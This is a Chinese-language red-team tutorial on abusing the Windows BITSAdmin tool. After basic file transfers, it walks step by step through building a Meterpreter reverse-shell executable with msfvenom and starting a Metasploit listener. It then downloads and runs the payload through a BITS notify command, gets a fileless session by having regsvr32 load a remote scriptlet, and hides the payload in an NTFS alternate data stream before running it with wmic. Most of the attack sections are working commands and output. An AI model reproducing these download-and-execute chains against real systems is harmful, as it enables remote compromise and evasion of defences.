BITSAdmin

1 year ago
red.ghostwolflab.com
7 minutes

BITSAdmin是一种命令行工具,可以用来创建下载或上传作业,并监视它们的进度。

下载文件

使用以下命令将远程文件下载到本地Windows主机:

bitsadmin /transfer hackingarticles http://192.168.8.145/test/hello.txt C:\Users\snowwolf\Desktop\hello.txt

复制文件

首先,我们需要进行声明Job名称:

PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {6143EB50-0335-46A2-AE74-FE12F01B9FCB}.

然后需要将传输的文件添加到Job中,使用以下命令将C:\Users\snowwolf\win7.txt文件传输到 C:\Users\snowwolf\Desktop\win7.txt:

PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab C:\Users\snowwolf\win7.txt C:\Users\snowwolf\Desktop\win7.txt

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added C:\Users\snowwolf\win7.txt -> C:\Users\snowwolf\Desktop\win7.txt to job.

现在要传输文件,需要先运行以下命令:

PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.

它会以临时文件传输,要完整地获取文件,需要再运行以下命令:

PS C:\Users\snowwolf\Desktop> bitsadmin /complete ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job completed.

使用type命令即可查看所传输的文件。

完整的图片演示如下:

PowerShell命令

随着Windows Server 2016的发布,微软更新了适用于PowerShell的BITSAdmin命令。

Start-BitsTransfer -Source http://192.168.8.145/test/hello.txt -Destination C:\Users\snowwolf\Desktop\hello.txt

Metasploit

使用如下命令生成一个exe的payload:

┌──(root㉿kali)-[/var/www/html/test]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=5555 -f exe > bits.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

然后输入以下命令在Metasploit的终端中开启监听:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.8.145:5555

在Windows主机上声明Job:

PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {2FD005C1-B95A-4556-9875-14043605D20A}.

在创建的Job中添加payload:

PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab  http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.

然后运行以下命令使用BITSAdmin下载文件并执行:

PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'cmd.exe' '/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe'.

最后运行如下命令即可运行下载的payload文件并获取到会话:

PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.

无文件托管

在Metasploit的终端中输入以下命令生成payload:

msf6 > use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 3
target => 3
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/script/web_delivery) > run

接下来我们需要在Windows主机上创建个无害化的Job:

# 创建Job
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {3B44478B-ABD3-4348-BB35-FC9FE37EDFCC}.
# 传输一个无害化的文本文件
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/hello.txt C:\Users\snowwolf\Desktop\hello.txt

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added http://192.168.8.145/test/hello.txt -> C:\Users\snowwolf\Desktop\hello.txt to job.

接下来修改执行命令:

PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab regsvr32 "/s /n /u /i:http://192.168.8.145:8080/q7sk3UuHZOH.sct scrobj.dll"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'regsvr32' '/s /n /u /i:http://192.168.8.145:8080/q7sk3UuHZOH.sct scrobj.dll'.

最后运行以下命令即可获取会话:

PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.

ADS

首先,我们沿用使用Metasploit创建的payload(bits.exe)并监听会话。

然后在Windows主机上执行以下命令创建Job并添加传输的文件:

PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Created job {CB5F142D-C22D-487F-AC4D-1E158130927C}.



PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.

然后读取文件中的内容并将其传输到bits.txt的替代数据流中:

PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe"

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

notification command line set to 'cmd.exe' '/c type C:\Users\snowwolf\Desktop\bits.exe > C:\Users\snowwolf\Desktop\bits.txt:bits.exe'.

接下来下载文件:

PS C:\Users\snowwolf\Desktop> bitsadmin /resume ghostwolflab

BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Job resumed.

最后,使用wmic执行即可获取会话:

PS C:\Users\snowwolf\Desktop> wmic process call create .\bits.exe
 Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 9;
};